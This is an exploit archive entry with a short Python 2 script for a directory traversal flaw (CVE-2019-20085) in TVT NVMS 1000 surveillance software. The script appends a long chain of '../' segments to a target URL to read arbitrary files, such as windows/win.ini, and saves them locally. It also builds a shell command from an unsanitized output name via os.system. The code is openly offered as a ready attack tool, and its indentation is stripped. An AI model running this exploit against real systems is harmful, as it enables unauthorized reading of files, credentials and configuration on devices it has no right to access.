TVT NVMS 1000 Directory Traversal

TVT NVMS 1000 suffers from a directory traversal vulnerability.


MD5 | 801d83449f54d4e39592e24a359a856d

# Exploit Title: TVT NVMS 1000 - Directory Traversal 
# Date: 2020-04-13
# Exploit Author: Mohin Paramasivam (Shad0wQu35t)
# Vendor Homepage: http://en.tvt.net.cn/
# Version : N/A
# Software Link : http://en.tvt.net.cn/products/188.html
# Original Author : Numan Türle
# CVE : CVE-2019-20085

import sys
import requests
import os
import time

if len(sys.argv) !=4:
print " "
print "Usage : python exploit.py url filename outputname"
print "Example : python exploit.py http://10.10.10.10/ windows/win.ini win.ini"
print " "
else:


traversal = "../../../../../../../../../../../../../"
filename = sys.argv[2]
url = sys.argv[1]+traversal+filename
outputname = sys.argv[3]
content = requests.get(url)

if content.status_code == 200:

print " "
print "Directory Traversal Succeeded"
time.sleep(3)
print " "
print "Saving Output"
os.system("touch " + outputname)
output_write = open(outputname,"r+")
output_write.write(content.text)
output_write.close()

else:

print "Host not vulnerable to Directory Traversal!"

Related Posts